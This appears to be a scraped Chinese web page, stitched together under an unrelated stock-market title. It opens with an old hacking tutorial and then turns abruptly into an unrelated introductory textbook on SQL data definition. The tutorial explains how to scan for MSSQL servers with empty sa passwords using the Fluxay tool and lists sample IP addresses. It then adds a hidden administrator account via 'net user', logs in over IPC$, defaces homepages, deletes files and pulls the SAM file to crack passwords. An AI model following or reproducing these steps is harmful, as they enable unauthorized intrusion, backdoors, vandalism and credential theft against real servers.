新股市盈率20倍涨多少:什么是SQL啊

在黑客攻击的手段中！运用u漏洞和c进行攻击比较常见！但经过我的实践！运用SQL远程登录结合ipc$是最有效和最简单的攻击方法！一旦扫到支持远程登录的SQL主机！并且sa密码为空！那他有80%的可能死定了！
其实用sql攻击大部分时间是用在扫描上！运用的工具是小榕的流光！快捷键ctrl＋r搜索！
选择aql！输入开始和结束的IP！扫描吧！然后可以到聊天室和MM聊天～！到搜索结束！察看流光最下面的视图！格式如下：
用户名 密码 地址
sa <null> 211.21.220.28
sa <null> 211.21.220.26
sa <null> 211.21.220.197
其中《null》表示密码为空！
双击其中一项（或在工具……>SQL登录）！会弹出一个dos窗口！如果过一会该窗口消失！没戏了！对方不支持远程登录！在换一个！如果过一会出现如下的字样：
SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas!
Connect to 211.21.220.28 MSSQL Server Success, Type Command in Prompt.
SQLCmd>
那表示已经登录上了对方的主机！然后
SQLCmd>net user ‘察看用户！如果不能察看，说明sa权限不够，那也没戏，换其他的方法！或是走人！有时用net user察看成功！再试试
SQLCmd>net user administrator ’察看Admin的情况（可知是否在线）如果失败，撤退吧，
没戏，换方法！
下一步：
SQLCmd>net user hacker password /add '添加一给名为hacker，密码为passwod的用户！
SQLCmd>net localgroup administrators hacker /add ' 把刚才创建的用户加入
Admnistrators组

好了，告一段落，下面启动DOS用刚创建的用户进行ipc$
net use \\*.*.*.*\ipc$ "password" /user:"hacker" '很熟悉吧！IPC$开始了！
执行成功的话！搞吧！删除！上传！下载！要什么！随你！
例如copy c:\hacker\index.htm \\*.*.*.*\c$\inetpub\wwwroot\default.htm
干什么，换他的主页啊！呵呵！

据我的实践！针对台湾的主机！另一方法是用刚创建的用户名和密码用CuteFtp登录！就象管理自己的站点一样！任意删除创建Html页面！此方法对美国的主机没有成功过！我都是IPC$搞定的！

以上谈的是更换主页和破坏一些文件！原理是用SQL开门！用IPC$进门做作administrator可以作的事！但对于SQL主机！Administrator一般没有对数据库删除或创建的权限！此时可以down下他的sam文件解密！默认用户名SQLAgentCmdExec，然后用天行的SQlBrowse登录就可以对数据库任意操作了！

SQL是Structured Quevy Language(结构化查询语言)的缩写。SQL是专为数据库而建立的操作命令集，是一种功能齐全的数据库语言。在使用它时，只需要发出“做什么”的命令，“怎么做”是不用使用者考虑的。SQL功能强大、简单易学、使用方便，已经成为了数据库操作的基础，并且现在几乎所有的数据库均支持SQL。 <br>
##1 二、SQL数据库数据体系结构 <br>
SQL数据库的数据体系结构基本上是三级结构，但使用术语与传统关系模型术语不同。在SQL中，关系模式(模式)称为“基本表”(base table)；存储模式(内模式)称为“存储文件”(stored file)；子模式(外模式)称为“视图”(view)；元组称为“行”(row)；属性称为“列”(column)。名称对称如^00100009a^： <br>
##1 三、SQL语言的组成 <br>
在正式学习SQL语言之前，首先让我们对SQL语言有一个基本认识，介绍一下SQL语言的组成： <br>
1.一个SQL数据库是表(Table)的集合，它由一个或多个SQL模式定义。 <br>
2.一个SQL表由行集构成，一行是列的序列(集合)，每列与行对应一个数据项。 <br>
3.一个表或者是一个基本表或者是一个视图。基本表是实际存储在数据库的表，而视图是由若干基本表或其他视图构成的表的定义。 <br>
4.一个基本表可以跨一个或多个存储文件，一个存储文件也可存放一个或多个基本表。每个存储文件与外部存储上一个物理文件对应。 <br>
5.用户可以用SQL语句对视图和基本表进行查询等操作。在用户角度来看，视图和基本表是一样的，没有区别，都是关系(表格)。 <br>
6.SQL用户可以是应用程序，也可以是终端用户。SQL语句可嵌入在宿主语言的程序中使用，宿主语言有FORTRAN，COBOL，PASCAL，PL/I，C和Ada语言等。SQL用户也能作为独立的用户接口，供交互环境下的终端用户使用。 <br>
##1 四、对数据库进行操作 <br>
SQL包括了所有对数据库的操作，主要是由4个部分组成： <br>
1.数据定义：这一部分又称为“SQL DDL”，定义数据库的逻辑结构，包括定义数据库、基本表、视图和索引4部分。 <br>
2.数据操纵：这一部分又称为“SQL DML”，其中包括数据查询和数据更新两大类操作，其中数据更新又包括插入、删除和更新三种操作。 <br>
3.数据控制：对用户访问数据的控制有基本表和视图的授权、完整性规则的描述，事务控制语句等。 <br>
4.嵌入式SQL语言的使用规定：规定SQL语句在宿主语言的程序中使用的规则。 <br>
下面我们将分别介绍： <br>
##2 (一)数据定义 <br>
SQL数据定义功能包括定义数据库、基本表、索引和视图。 <br>
首先，让我们了解一下SQL所提供的基本数据类型：(如^00100009b^) <br>
1.数据库的建立与删除 <br>
(1)建立数据库：数据库是一个包括了多个基本表的数据集，其语句格式为： <br>
CREATE DATABASE <数据库名> 〔其它参数〕 <br>
其中，<数据库名>在系统中必须是唯一的，不能重复，不然将导致数据存取失误。〔其它参数〕因具体数据库实现系统不同而异。 <br>
例：要建立项目管理数据库(xmmanage)，其语句应为： <br>
CREATE DATABASE xmmanage <br>
(2) 数据库的删除：将数据库及其全部内容从系统中删除。 <br>
其语句格式为：DROP DATABASE <数据库名> <br>
例：删除项目管理数据库(xmmanage)，其语句应为： <br>
DROP DATABASE xmmanage <br>
2.基本表的定义及变更 <br>
本身独立存在的表称为基本表，在SQL语言中一个关系唯一对应一个基本表。基本表的定义指建立基本关系模式，而变更则是指对数据库中已存在的基本表进行删除与修改。 <br>
……<br>